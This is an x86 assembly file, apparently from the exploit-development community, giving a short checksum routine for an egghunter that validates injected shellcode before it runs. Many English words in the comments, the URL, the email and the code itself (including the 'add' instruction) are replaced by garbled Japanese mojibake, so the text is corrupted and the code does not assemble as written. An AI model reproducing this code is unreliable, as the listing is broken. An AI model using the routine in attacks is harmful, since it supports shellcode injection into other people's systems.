;°Î¶È¡¿ÍøÍѤ¹¤ë ¸ª½ñ¤òÍ¿¤¨¤ë: Shellcode Checksum ·è¤Þ¤ê¤­¤Ã¤¿»Å»ö
;Date: Sept 1 2010
;Author: dijital1
;¥½¥Õ¥È¥¦¥§¥¢ Link:  http://www.ciphermonk.ÂáÊ᤹¤ë/code/°Î¶È¡¿ÍøÍѤ¹¤ës/shellcode-checksum.asm
;¼Â¸³¡Ê¤¹¤ë¡Ëd on: Omelet Hunter Shellcode in MSF
 
[BITS 32]
 
;Author: Ron Henry - dijital1
;Email: rlh@ciphermonk.ÂáÊ᤹¤ë
;¾ì½ê¡¿°ÌÃÖ: http://www.ciphermonk.ÂáÊ᤹¤ë
;Greetz to °Î¶È¡¿ÍøÍѤ¹¤ë-db and Team Corelan
 
;Ok... couple of ²¾Äê¡¿°ú¤­¼õ¤±¤ë¤³¤Ès with this code. First, we're using a Áª¤Ó½Ð¤¹¡¿ÆÈ¿È
;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a
;¾×ÆÍ¡¿ÉÔ°ìÃ×.
;We consider this a worthwhile ´í¸± given the Á´ÂΤˤ錄¤ë size of the code; 18 bytes.
 
;There are a couple ways to ´ï¶ñ¡¿¼Â»Ü¤¹¤ë this, but a good example is how it
;was used in Peter ÀèƬ Eeckhoutte's omelet egghunter mixin that was recently
;Äɲ乤ëd to the Metasploit ÏÈÁȤß.
 
;We're using a 1 byte footer at the end of the shellcode that ´Þ¤à¡¿Éõ¤¸¹þ¤á¤ës the
;checksum À¸À®¤¹¤ëd at shellcode ÁϤ.
 
; Variables eax: accumulator
;           edx: points to ¸½ºß¤Î byte in shellcode
;           ecx: È¿ÂФ¹¤ë
 
egg_size equ 0x7a       ;we're ¼Â¸³¡Ê¤¹¤ë¡Ëing 122 bytes in this instance
 
find_egg:
 
xor ecx, ecx            ;̵ the È¿ÂФ¹¤ë
xor eax, eax            ;̵ the accumlator
 
calc_chksum_loop:
Äɲ乤ë al, byte [edx+ecx]  ;Äɲ乤ë the byte to running total
inc ecx                 ;increment the È¿ÂФ¹¤ë
cmp cl, egg_size        ;cmp È¿ÂФ¹¤ë to egg_size
jnz calc_chksum_loop    ;if it's not equal repeat
 
test_ckksum:
cmp al, byte [edx+ecx]  ;cmp eax with 1 byte checksum
jnz find_egg            ;search for another egg if checksum is µ¶¤Î